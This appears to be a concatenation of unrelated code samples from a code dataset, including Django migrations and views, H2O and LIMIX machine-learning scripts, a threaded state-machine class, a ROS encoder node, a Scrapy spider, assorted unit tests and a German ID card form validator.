# [1,2,3],
# [4,5,6],
# [7,8,9]
# ]
# so, a[0] = [1,2,3], a[0][0]=a[0,0]=1, a[0][1]=a[0,1]=2......
# Preprocessing.py lines 78 and 79
# mat = io.loadmat(img_path.replace('.jpg','.mat').replace('images','ground-truth').replace('IMG_','GT_IMG_'))
# mat["image_info"][0,0][0,0][0] this line can be understood using the structure of image_info above
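# A minimal loading sketch (assuming scipy is available and a ground-truth file
# laid out as documented in this file; the filename below is only illustrative):
#   from scipy import io
#   mat = io.loadmat('GT_IMG_1.mat')
#   points = mat["image_info"][0, 0][0, 0][0]            # (N, 2) array of head coordinates
#   count = int(mat["image_info"][0, 0][0, 0][1][0, 0])  # total head count, e.g. 277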
'image_info':
array( # array1 starts
[
[ # arra1[0,0]
array( # array2 starts
[
[ # array1[0,0][0,0] or array2[0,0]
( # tuple
array( # array2.1 starts , arra1[0,0][0,0][0]
[
[ 524.17564209, 611.31179232],
[ 20.58878763, 594.48550124],
...
...
...
[ 109.35965995, 139.72929032]
]
), # array2.1 ends
array( # array2.2 starts , arra1[0,0][0,0][1]
[
[277]
]
, dtype=uint16) # array2.2 ends
)
]
]
, dtype=[('location', 'O'), ('number', 'O')]) # array2 ends
]
]
, dtype=object) #array1 ends
} | StarcoderdataPython |
146726 | # Generated by Django 2.2.1 on 2019-07-11 07:05
from django.db import migrations
import pretix.base.models.fields
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0126_item_show_quota_left'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='dependency_value',
new_name='dependency_values',
),
migrations.AlterField(
model_name='question',
name='dependency_values',
field=pretix.base.models.fields.MultiStringField(default=['']),
),
]
| StarcoderdataPython |
4841593 | def factorial(n):
# state a base case of if n equals zero
if n == 0:
# return 1
return 1
# return n multiplied by factorial called with n - 1
return n * factorial(n - 1)
print(factorial(5))
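# Worked expansion of the call above:
#   factorial(5) = 5 * factorial(4)
#                = 5 * 4 * factorial(3)
#                = 5 * 4 * 3 * factorial(2)
#                = 5 * 4 * 3 * 2 * factorial(1)
#                = 5 * 4 * 3 * 2 * 1 * factorial(0)
#                = 5 * 4 * 3 * 2 * 1 * 1 = 120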
| StarcoderdataPython |
78066 | # proxy module
from pyface.grid.grid_cell_renderer import *
| StarcoderdataPython |
176314 | <filename>h2o-py/tests/testdir_algos/rf/pyunit_node_assignment_prostateRF.py
from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.random_forest import H2ORandomForestEstimator
from h2o.tree.tree import H2OTree
def map_node_ids_to_paths():
prostate_train = h2o.import_file(path=pyunit_utils.locate("smalldata/prostate/prostate.csv"))
prostate_train["CAPSULE"] = prostate_train["CAPSULE"].asfactor()
prostate_train = prostate_train.drop("ID")
decision_tree = H2ORandomForestEstimator(ntrees=1, sample_rate=1.0, mtries=len(prostate_train.columns) - 1)
decision_tree.train(y="AGE", training_frame=prostate_train)
tree = H2OTree(
model=decision_tree,
tree_number=0,
plain_language_rules=True
)
predictions = list(decision_tree.predict(prostate_train).as_data_frame()["predict"])
node_ids = list(decision_tree.predict_leaf_node_assignment(prostate_train, type="Node_ID").as_data_frame()["T1"])
# figure out how node ids map to decision paths
decision_path_ids = list(map(lambda x: tree.node_ids.index(x), node_ids))
# check that the paths produce correct predictions
predictions_to_paths = list(zip(predictions, [tree.decision_paths[i] for i in decision_path_ids]))
for (prediction, path) in predictions_to_paths:
prediction_from_path = float(path[path.index("Prediction: ") + len("Prediction: "):])
assert abs(prediction_from_path - prediction) < 1e-6
if __name__ == "__main__":
pyunit_utils.standalone_test(map_node_ids_to_paths)
else:
map_node_ids_to_paths()
| StarcoderdataPython |
4828834 | import time
import typing
import traceback
import threading
import warnings
from .state_status import StateStatus
from .board import Board
class State():
# Name of this state
_name: str
_transitions: typing.Sequence[typing.Tuple[typing.Callable[[
'State', Board], bool], 'State']] # Store the transitions of the state
# Hold the thread executing the action
_run_thread: threading.Thread
# Status of this state
_status: StateStatus
_internal_exception: Exception
# Event acting as a flag for interruptions
_interupted_event: threading.Event
# use two variables to pass information between same-level states
flow_in: typing.Any
flow_out: typing.Any
# information about state
_state_last_start_time: float
_state_last_end_time: float
def __init__(self, name):
self._name = name
self._transitions = []
self._run_thread = None
self._interupted_event = threading.Event()
self._internal_exception = None
self._status = StateStatus.UNKNOWN
self.flow_in = None
self.flow_out = None
self._state_last_end_time = -1
self._state_last_start_time = -1
def check_name(self, compare: str) -> bool:
"""Check if this state has the same name as the given state
Parameters
----------
compare : str
Name to be checked against
Returns
-------
bool
True if the name is the same
"""
return compare == self._name
def checkName(self, compare: str) -> bool:
warnings.warn("use check_name instead", DeprecationWarning)
return self.check_name(compare)
    def check_status(self, compare: StateStatus) -> bool:
        """Check whether this state's status is the same as the given status
Parameters
----------
compare : StateStatus
Enum for the status to check against
Returns
-------
bool
True if the status is the same.
"""
return self._status == compare
def checkStatus(self, compare: StateStatus) -> bool:
warnings.warn("use check_status instead", DeprecationWarning)
return self.check_status(compare)
    def add_transition(self, cond: typing.Callable[['State', Board], bool], next_state: 'State') -> None:
        """Add a transition to the state. Provide a checking method (cond) that, when it returns true,
        signals this state to transition to the associated state. Note that transitions are tested in the
        order they were added; if multiple transition functions return true, the state transitions to the first added state.
Parameters
----------
cond : typing.Callable[[State, Board], bool]
Function to determine if this transition should be taken
next_state : State
The next state to go to.
"""
self._transitions.append((cond, next_state))
def add_transition_after_elapsed(self, next_state: 'State', duration: float) -> None:
"""Add transition to this state that moves to the next state after a fixed duration has
        passed since the state started executing.
Parameters
----------
next_state : State
Next state to go to.
duration : float
Time in seconds that should have passed before transitioning.
"""
def timepassed(s: 'State', b: 'Board'):
if s._state_last_start_time > 0 and duration >= 0:
curr_time = time.time()
if (curr_time - s._state_last_start_time) > duration:
return True
return False
self.add_transition(timepassed, next_state)
    def add_transition_on_complete(self, next_state: 'State', ignore_exeception: bool = False) -> None:
        """Add a transition to this state so that when the state finishes execution, regardless of outcome,
        it moves to the given state.
Parameters
----------
next_state : State
State to transition to
ignore_exeception: bool
Whether to also ignore exceptions
"""
self.add_transition(lambda x, y: not x._run_thread.is_alive()
and (ignore_exeception or not x.check_status(StateStatus.EXCEPTION)), next_state)
    def add_transition_on_success(self, next_state: 'State') -> None:
        """Add a transition to this state so that when it completes successfully, it moves to the given state.
Parameters
----------
next_state : State
State to transition to.
"""
self.add_transition(lambda x, y: x._status == StateStatus.SUCCESS, next_state)
    def add_transition_on_failed(self, next_state: 'State') -> None:
        """Add a transition to this state so that when the state fails, it moves to the given state.
Parameters
----------
next_state : State
State to transition to
"""
self.add_transition(lambda x, y: x._status == StateStatus.FAILED, next_state)
    def execute(self, board: Board) -> StateStatus:
        """All derived classes should override this method. It is run in a separate thread when
        the state is running.
Parameters
----------
board : Board
Board object that is being passed between multiple states.
Returns
-------
StateStatus (Optional)
            When the state completes, whether it was successful or not. This is useful for shorthand transitions
            that fire only on successful (or failed) completion.
"""
raise NotImplementedError("Default execute method is not overwritten")
def _execute(self, board: Board):
try:
self.pre_execute()
self._status = self.execute(board)
self.post_execute()
except Exception as e:
self._internal_exception = e
self._status = StateStatus.EXCEPTION
if self._status is None:
self._status = StateStatus.NOT_SPECIFIED
def start(self, board: Board, flow_in: typing.Any = None) -> None:
self._status = StateStatus.RUNNING
self.flow_in = flow_in
self.flow_out = None
self._interupted_event.clear()
self._run_thread = threading.Thread(target=self._execute, args=(board,), name=self._name)
self._run_thread.start()
    def wait(self, timeout: float = None) -> bool:
        """Wait for the current state to complete. You can also specify a timeout to prevent an infinite loop.
Parameters
----------
timeout : float, optional
Timeout in seconds, None will mean wait forever, by default None
Returns
-------
bool
            Whether the current state finished; if false, it timed out.
"""
if self._run_thread is not None and self._run_thread.is_alive():
self._run_thread.join(timeout)
return not self._run_thread.is_alive()
return True
def signal_interrupt(self):
self._interupted_event.set()
def interrupt(self, timeout: float = None) -> bool:
"""Interrupts the current execution of the state.
        Once interrupted, this state will try to stop as
        soon as possible.
Parameters
----------
timeout : float, optional
timeout in seconds, by default None
Returns
-------
bool
True if the state is no longer running or interrupted. False if timeout.
"""
# signal the execute method to be interrupted.
self.signal_interrupt()
if self._run_thread is not None:
if self._run_thread.is_alive():
self._run_thread.join(timeout)
# TODO check if this creates a race condition, is_alive() might still be true immediately after run() ends.
return not self._run_thread.is_alive()
else:
return True
def is_interrupted(self) -> bool:
"""Method to check whether the state itself is being interrupted
Returns
-------
bool
True if interrupted, false otherwise.
"""
return self._interupted_event.is_set()
def tick(self, board: Board) -> 'State':
"""Check whether any of the attached transitions should be taken. If yes, return the next state it should go to
Parameters
----------
board : Board
Blackboard holding the value passed around.
Returns
-------
State
            The next state it should go to; self is returned if no transition should be taken.
"""
# check all the transitions
for transition in self._transitions:
if transition[0](self, board):
self.interrupt(timeout=None)
# start the next state
transition[1].start(board, self.flow_out)
return transition[1] # return the state to the execution
return self
def print_debugging_info(self) -> None:
"""Print Debug Information such as name and status of state.
"""
print(f" state name:{self._name} --- {self._status}")
if self._internal_exception is not None:
print(f"INTERNAL EXCEPTION {type(self._internal_exception)}")
print(''.join(traceback.TracebackException.from_exception(
self._internal_exception).format()))
def get_debug_info(self) -> typing.Dict[str, typing.Any]:
return {
'name': self._name,
'type': type(self).__name__,
'status': self._status
}
def get_debug_name(self) -> str:
""" Return the name and type of state. Helps with debugging.
Returns:
str: Name and Type of State.
"""
return f"{self._name}({self.__class__.__name__})"
def pre_execute(self):
self._state_last_start_time = time.time()
def post_execute(self):
self._state_last_end_time = time.time()
pass
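# A minimal usage sketch (illustrative only; ``EchoState`` and the driver loop are
# hypothetical and assume Board() can be constructed without arguments):
#   class EchoState(State):
#       def execute(self, board: Board) -> StateStatus:
#           print(f"running {self._name}")
#           return StateStatus.SUCCESS
#   start = EchoState("start")
#   done = EchoState("done")
#   start.add_transition_on_success(done)
#   board = Board()
#   start.start(board)
#   current = start
#   while not current.check_name("done"):
#       current = current.tick(board)
#       time.sleep(0.05)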
| StarcoderdataPython |
3319294 | <reponame>fiaasco/php7<filename>molecule/ubuntu/tests/test_php7_bionic.py<gh_stars>0
import os
import pytest
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('php7-ubuntu-bionic')
@pytest.mark.parametrize('pkg', ['php7.2-fpm',
'php7.2-common',
'php7.2-cli',
'php7.2-curl',
'php7.2-dev',
'php7.2-gd',
'php7.2-mysql',
'php7.2-mbstring',
'php7.2-intl',
'php7.2-json',
'php7.2-soap',
'php7.2-xml',
'php7.2-xmlrpc',
'php7.2-zip',
'php-imagick',
'php-pear',
'php7.2-bcmath',
])
def test_default_packages(host, pkg):
""" check if packages are installed
"""
assert host.package(pkg).is_installed
def test_service(host):
""" check if service is running
"""
assert host.service('php7.2-fpm').is_enabled
assert host.service('php7.2-fpm').is_running
| StarcoderdataPython |
3343786 | <reponame>andrejchikilev/django-stored-messages<filename>stored_messages/tests/test_restapi.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from unittest import skipUnless
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from stored_messages.constants import STORED_ERROR
from .base import BackendBaseTest
try:
import rest_framework # noqa
rest_framework_installed = True
except ImportError:
rest_framework_installed = False
@skipUnless(rest_framework_installed, "Django restframework is not installed")
class TestRESTApi(BackendBaseTest):
def test_list(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 2)
self.assertEqual(messages[0]['message'], 'an error ☢')
self.assertEqual(messages[1]['message'], 'an error ☢')
self.assertEqual(messages[0]['level'], STORED_ERROR)
self.assertEqual(messages[1]['level'], STORED_ERROR)
def test_retrieve(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
id = messages[0]['id']
r = self.client.get(reverse('stored_messages:inbox-detail', kwargs={'pk': id}))
message = json.loads(r.content.decode('utf-8'))
self.assertEqual(message['message'], 'an error ☢')
self.assertEqual(message['id'], id)
def test_make_read(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 1)
msg_id = messages[0]['id']
r = self.client.post(reverse('stored_messages:inbox-read', args=(msg_id,)))
self.assertEqual(r.status_code, 200)
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
def test_anon(self):
self.client.get('/create')
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
def test_mark_all_read(self):
self.client.login(username='test_user', password='<PASSWORD>')
self.client.get('/create')
r = self.client.post(reverse('stored_messages:mark_all_read'))
self.assertEqual(r.status_code, 200)
r = self.client.get(reverse('stored_messages:inbox-list'))
messages = json.loads(r.content.decode('utf-8'))
self.assertEqual(len(messages), 0)
@skipUnless(rest_framework_installed, "Django restframework is not installed")
@override_settings(STORED_MESSAGES={'STORAGE_BACKEND': 'stored_messages.backends.RedisBackend'})
class TestRESTApiWithRedis(TestRESTApi):
pass
| StarcoderdataPython |
1686852 | <reponame>guru-narayana/autonomous-car-SLAM-and-ROS-Navigation-
#! /usr/bin/python
from RPi import GPIO
import signal
import rospy
from geometry_msgs.msg import Twist
clk1 = 13 #left wheel
dt1 = 6
clk2 = 19 #right Wheel
dt2 = 26
def keyboardInterruptHandler(signal, frame):
print("this is velocity publisher signing off ...")
exit(0)
GPIO.setmode(GPIO.BCM)
GPIO.setup(clk1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(dt1, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(clk2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(dt2, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
pub = rospy.Publisher("g_cmd_vel",Twist,queue_size = 10)
rospy.init_node("encoders_data")
vel = Twist()
vel.linear.x = 0
vel.linear.y = 0
vel.linear.z = 0
vel.angular.x = 0
vel.angular.y = 0
vel.angular.z = 0
previous_time_l = rospy.get_time()
previous_time_r = rospy.get_time()
left_vel = 0
right_vel = 0
left_dist = 0
right_dist = 0
dl = 0
dr = 0
left_dist_prev = 0
right_dist_prev = 0
clkLastState1 = GPIO.input(clk1)
clkLastState2 = GPIO.input(clk2)
try:
while True:
clkState1 = GPIO.input(clk1)
clkState2 = GPIO.input(clk2)
dtState1= GPIO.input(dt1)
dtState2= GPIO.input(dt2)
present_time = rospy.get_time()
dtl = (present_time - previous_time_l)
dtr = (present_time - previous_time_r)
if clkState1 != clkLastState1:
if dtState1 != clkState1:
left_dist+= 0.0055
else:
left_dist+= -0.0055
if clkState2 != clkLastState2:
if dtState2 != clkState2:
right_dist+= 0.0055
else:
right_dist+= -0.0055
dl = left_dist-left_dist_prev
dr = right_dist-right_dist_prev
if abs(dtl) > 0.1 and abs(dtr) > 0.1:
left_vel = (left_dist-left_dist_prev)/dtl
left_dist_prev = left_dist
previous_time_l = present_time
right_vel = (right_dist-right_dist_prev)/dtr
right_dist_prev = right_dist
previous_time_r = present_time
clkLastState1 = clkState1
clkLastState2 = clkState2
vel.linear.x = (left_vel + right_vel)/2
vel.angular.z = (right_vel - left_vel)/(0.195)
vel.linear.x = round(vel.linear.x ,2)
vel.angular.z = round(vel.angular.z,2)
pub.publish(vel)
rospy.loginfo(vel)
signal.signal(signal.SIGINT, keyboardInterruptHandler)
finally:
GPIO.cleanup()
| StarcoderdataPython |
1702297 | <reponame>letaylor/limix
# Copyright(c) 2014, The LIMIX developers (<NAME>, <NAME>, <NAME>)
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import sys
sys.path.append('./../../release.darwin/interfaces/python')
import limix
import scipy as SP
import pdb
import time
import scipy.linalg as linalg
def PCA(Y, components):
    """run PCA, retrieving the first (components) principal components
return [s0, eig, w0]
s0: factors
w0: weights
"""
sv = linalg.svd(Y, full_matrices=0);
[s0, w0] = [sv[0][:, 0:components], SP.dot(SP.diag(sv[1]), sv[2]).T[:, 0:components]]
v = s0.std(axis=0)
s0 /= v;
w0 *= v;
return [s0, w0]
SP.random.seed(1)
#1. simulate data from a linear PCA model
N = 100
K = 5
D = 100
SP.random.seed(1)
S = SP.random.randn(N,K)
W = SP.random.randn(D,K)
Y = SP.dot(W,S.T).T
Y+= 0.1*SP.random.randn(N,D)
X0 = SP.random.randn(N,K)
X0 = PCA(Y,K)[0]
#starting params
covar_params = SP.array([1.0])
lik_params = SP.array([0.1])
#GPMIX:
covar = limix.CCovLinearISO(K)
ll = limix.CLikNormalIso()
#create hyperparm
hyperparams = limix.CGPHyperParams()
hyperparams['covar'] = covar_params
hyperparams['lik'] = lik_params
hyperparams['X'] = X0
#cretae GP
gp=limix.CGPbase(covar,ll)
#set data
gp.setY(Y)
gp.setX(X0)
lml0 = gp.LML(hyperparams)
dlml0 = gp.LMLgrad(hyperparams)
#optimization
lml0 = gp.LML()
dlml0 = gp.LMLgrad(hyperparams)
gpopt = limix.CGPopt(gp)
t2 = time.time()
gpopt.opt()
t3 = time.time()
| StarcoderdataPython |
1628736 | <reponame>rennerocha/pybr14-scrapy-tutorial<gh_stars>1-10
import scrapy
class MyFirstSpider(scrapy.Spider):
name = 'my-first-spider'
def start_requests(self):
urls = [
'http://quotes.toscrape.com/page/1/',
'http://quotes.toscrape.com/page/2/',
]
requests = []
for url in urls:
requests.append(
scrapy.Request(url=url, callback=self.parse))
return requests
def parse(self, response):
self.logger.info('Just parsing {}'.format(response.url))
| StarcoderdataPython |
3354304 | import copy
import contextlib
import StringIO
import unittest
from view import viewfile
def _make_simple_entry(name, branch='master', revision='HEAD'):
return viewfile.ViewFileEntry(name, 'git://{0}/{0}'.format(name), 'GIT',
branch, revision)
class TestViewFileEntryMethods(unittest.TestCase):
def test_has_revision(self):
unversioned_entry = _make_simple_entry('foo')
versioned_entry = _make_simple_entry(
'foo',
revision='7783ac32d05162f328bba0d64e56b80a9f15bb17')
self.assertFalse(unversioned_entry.has_revision())
self.assertTrue(versioned_entry.has_revision())
def test_eq(self):
self.assertTrue(_make_simple_entry('foo') == _make_simple_entry('foo'))
self.assertFalse(_make_simple_entry('foo') == _make_simple_entry('bar'))
class TestViewFileMethods(unittest.TestCase):
def test_dump(self):
view = viewfile.ViewFile()
view.entries.append(_make_simple_entry('foo'))
with contextlib.closing(StringIO.StringIO()) as f:
view.dump(f)
contents = f.getvalue()
self.assertEqual(contents,
'foo git://foo/foo GIT master HEAD\n')
def test_eq(self):
foo1 = viewfile.ViewFile([_make_simple_entry('foo')])
foo2 = viewfile.ViewFile([_make_simple_entry('foo')])
bar = viewfile.ViewFile([_make_simple_entry('bar')])
self.assertTrue(foo1 == foo2)
self.assertFalse(foo1 == bar)
class TestViewFileParse(unittest.TestCase):
def test_valid(self):
contents = \
'''
# Comments and whitespace only lines should be ignored
foo git://foo/foo GIT master HEAD
'''
with contextlib.closing(StringIO.StringIO(contents)) as f:
view = viewfile.parse(f)
expected = viewfile.ViewFile([_make_simple_entry('foo')])
self.assertEqual(view, expected)
def test_invalid(self):
invalid_views = [
'foo git://foo/foo GIT master',
'foo git://foo/foo GIT master HEAD extra'
]
for s in invalid_views:
with contextlib.closing(StringIO.StringIO(s)) as f:
with self.assertRaises(viewfile.ParseError):
viewfile.parse(f)
class TestViewFileDiff(unittest.TestCase):
def setUp(self):
self.foo_entry = _make_simple_entry('foo')
self.bar_entry = _make_simple_entry('bar')
self.foo_dev_entry = _make_simple_entry('foo', branch='dev')
self.empty_view = viewfile.ViewFile()
self.foo_view = viewfile.ViewFile([copy.copy(self.foo_entry)])
self.bar_view = viewfile.ViewFile([copy.copy(self.bar_entry)])
self.foobar_view = viewfile.ViewFile([copy.copy(self.foo_entry),
copy.copy(self.bar_entry)])
self.foo_dev_view = viewfile.ViewFile([copy.copy(self.foo_dev_entry)])
def test_no_changes(self):
diff = viewfile.diff(self.empty_view, self.empty_view)
self.assertEqual(diff, {})
diff = viewfile.diff(self.foo_view, self.foo_view)
self.assertEqual(diff, {})
def test_added(self):
diff = viewfile.diff(self.empty_view, self.foo_view)
self.assertEqual(diff, {'foo': (None, self.foo_entry)})
diff = viewfile.diff(self.empty_view, self.foobar_view)
self.assertEqual(diff, {'bar': (None, self.bar_entry),
'foo': (None, self.foo_entry)})
diff = viewfile.diff(self.foo_view, self.foobar_view)
self.assertEqual(diff, {'bar': (None, self.bar_entry)})
def test_removed(self):
diff = viewfile.diff(self.foo_view, self.empty_view)
self.assertEqual(diff, {'foo': (self.foo_entry, None)})
diff = viewfile.diff(self.foobar_view, self.empty_view)
self.assertEqual(diff, {'bar': (self.bar_entry, None),
'foo': (self.foo_entry, None)})
diff = viewfile.diff(self.foobar_view, self.foo_view)
self.assertEqual(diff, {'bar': (self.bar_entry, None)})
def test_changed(self):
diff = viewfile.diff(self.foo_view, self.foo_dev_view)
self.assertEqual(diff, {'foo': (self.foo_entry, self.foo_dev_entry)})
def test_complex(self):
diff = viewfile.diff(self.foobar_view, self.foo_dev_view)
self.assertEqual(diff, {'foo': (self.foo_entry, self.foo_dev_entry),
'bar': (self.bar_entry, None)})
| StarcoderdataPython |
1639321 | __version__ = "0.12.17.5"
| StarcoderdataPython |
1689956 | <reponame>hayj/MachineLearning
import numpy as np
from operator import itemgetter
def softmax_mean_rank(y_true, y_pred):
"""
    This function calculates the mean rank of the true category.
    A score near 1 means the model consistently ranks the true class near the top of the softmax;
    a score near 0.5 corresponds to a random softmax.
"""
scores = []
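    # Worked example: with 7 classes, if the true class has the 2nd highest
    # predicted probability its rank is 1, the per-sample score is 1/(7-1) ~= 0.167,
    # and such a sample contributes 1 - 0.167 = 0.833 to the returned value.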
for i in range(len(y_true)):
t = y_true[i]
p = y_pred[i]
position = np.where(t == 1)[0][0]
p = [(x, u) for u, x in enumerate(p)]
p = sorted(p, key=itemgetter(0), reverse=True)
rank = 0
u = 0
for current in p:
if current[1] == position:
rank = u
break
u += 1
score = rank / (len(p) - 1)
scores.append(score)
return 1.0 - np.mean(scores)
if __name__ == '__main__':
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
))
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
))
print(softmax_mean_rank\
(
np.array(
[
[0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
]),
np.array(
[
[0.1, 0.1, 0.1, 0.1, 0.6, 0.8, 0.1],
[0.1, 0.3, 0.1, 0.1, 0.6, 0.4, 0.1],
[0.1, 0.5, 0.0, 0.1, 0.6, 0.4, 0.9],
])
)) | StarcoderdataPython |
119732 | from django.shortcuts import render
from django.http import HttpResponse
from apps.inverted import main, main2, main3
# Create your views here.
# def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
def home(request):
return render(request, 'apps/home.html')
def index(request):
return render(request, 'apps/index.html')
def index2(request):
return render(request, 'apps/index2.html')
def index3(request):
return render(request, 'apps/index3.html')
def lyric(request,id):
text, judul = main.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric.html', content)
def lyric2(request, id):
text,judul = main2.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric2.html', content)
def lyric3(request, id):
text,judul = main3.detail(id)
content={
'no': id,
'judul':judul,
'text':text
}
return render(request, 'apps/lyric3.html', content)
def result2(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
    content = {}  # default context for non-POST requests
    if request.method == 'POST':
query = request.POST['querysearch']
hasil = main2.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result2.html',content)
def result3(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
    content = {}  # default context for non-POST requests
    if request.method == 'POST':
query = request.POST['querysearch']
hasil = main3.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result3.html',content)
def result(request):
#%%
# proximity_index = collections.OrderedDict(sorted(proximity_index.items()))
# for key, value in proximity_index.items():
# # print (key, value)
    content = {}  # default context for non-POST requests
    if request.method == 'POST':
query = request.POST['querysearch']
hasil= main.main(query)
content={
'hasil':hasil,
'query':query
}
return render(request, 'apps/result.html',content)
| StarcoderdataPython |
3234696 |
class LinkedList:
def __init__(self):
self.head = self.get_sentinal()
self.tail = self.get_sentinal()
        self.head.next = self.tail
        self.tail.prev = self.head  # link the tail sentinel back to the head so the list is doubly linked
def get_sentinal(self):
return Node(None, None, None)
class Node:
def __init__(self, prev, data, next):
self.prev = prev
self.data = data
self.next = next
| StarcoderdataPython |
4825880 | class Card:
def __init__(self,suit,face):
self.suit = int(suit)
self.face = int(face)
def cardSuit(self):
if self.suit == 0:
return "SPADES"
elif self.suit == 1:
return "HEARTS"
elif self.suit == 2:
return "CLUBS"
elif self.suit == 3:
return "DIAMONDS"
def cardWorth(self):
if self.face == 0:
return 11
elif self.face < 10:
return self.face + 1
else:
return 10
def cardFace(self):
if self.face == 0:
return "ACE"
elif self.face > 0 and self.face < 10:
return self.face + 1
elif self.face == 10:
return "JACK"
elif self.face == 11:
return "QUEEN"
elif self.face == 12:
return "KING"
def printCard(self):
print(str(self.cardFace()) + " OF " + self.cardSuit())
def __str__(self):
return str(self.cardFace()) + " OF " + self.cardSuit()
def __repr__(self):
return self.__str__()
| StarcoderdataPython |
34609 | from unittest import TestCase
import os
class TestSet_up_logger(TestCase):
def test_set_up_logger(self):
from utils import set_up_logger
from logging import Logger
logger = set_up_logger("test", "test.log")
self.assertIsInstance(logger, Logger)
os.remove("test.log")
| StarcoderdataPython |
117395 | <reponame>Akash16s/youtube-video-fetch-api
# Generated by Django 3.0.5 on 2020-04-29 06:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('apiCall', '0003_youtubemodel'),
]
operations = [
migrations.AlterField(
model_name='youtubemodel',
name='thumbnail_url',
field=models.TextField(),
),
]
| StarcoderdataPython |
4836177 | <filename>django/contrib/localflavor/de/forms.py
"""
DE-specific Form helpers
"""
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
import re
id_re = re.compile(r"^(?P<residence>\d{10})(?P<origin>\w{1,3})[-\ ]?(?P<birthday>\d{7})[-\ ]?(?P<validity>\d{7})[-\ ]?(?P<checksum>\d{1})$")
class DEZipCodeField(RegexField):
default_error_messages = {
'invalid': _('Enter a zip code in the format XXXXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(DEZipCodeField, self).__init__(r'^\d{5}$',
max_length, min_length, *args, **kwargs)
class DEStateSelect(Select):
"""
A Select widget that uses a list of DE states as its choices.
"""
def __init__(self, attrs=None):
from de_states import STATE_CHOICES
super(DEStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class DEIdentityCardNumberField(Field):
"""
A German identity card number.
Checks the following rules to determine whether the number is valid:
* Conforms to the XXXXXXXXXXX-XXXXXXX-XXXXXXX-X format.
* No group consists entirely of zeroes.
* Included checksums match calculated checksums
Algorithm is documented at http://de.wikipedia.org/wiki/Personalausweis
"""
default_error_messages = {
'invalid': _('Enter a valid German identity card number in XXXXXXXXXXX-XXXXXXX-XXXXXXX-X format.'),
}
def has_valid_checksum(self, number):
given_number, given_checksum = number[:-1], number[-1]
calculated_checksum = 0
fragment = ""
parameter = 7
for i in range(len(given_number)):
fragment = str(int(given_number[i]) * parameter)
if fragment.isalnum():
calculated_checksum += int(fragment[-1])
if parameter == 1:
parameter = 7
elif parameter == 3:
parameter = 1
elif parameter ==7:
parameter = 3
return str(calculated_checksum)[-1] == given_checksum
def clean(self, value):
super(DEIdentityCardNumberField, self).clean(value)
if value in EMPTY_VALUES:
return u''
match = re.match(id_re, value)
if not match:
raise ValidationError(self.error_messages['invalid'])
gd = match.groupdict()
residence, origin = gd['residence'], gd['origin']
birthday, validity, checksum = gd['birthday'], gd['validity'], gd['checksum']
if residence == '0000000000' or birthday == '0000000' or validity == '0000000':
raise ValidationError(self.error_messages['invalid'])
all_digits = u"%s%s%s%s" % (residence, birthday, validity, checksum)
if not self.has_valid_checksum(residence) or not self.has_valid_checksum(birthday) or \
not self.has_valid_checksum(validity) or not self.has_valid_checksum(all_digits):
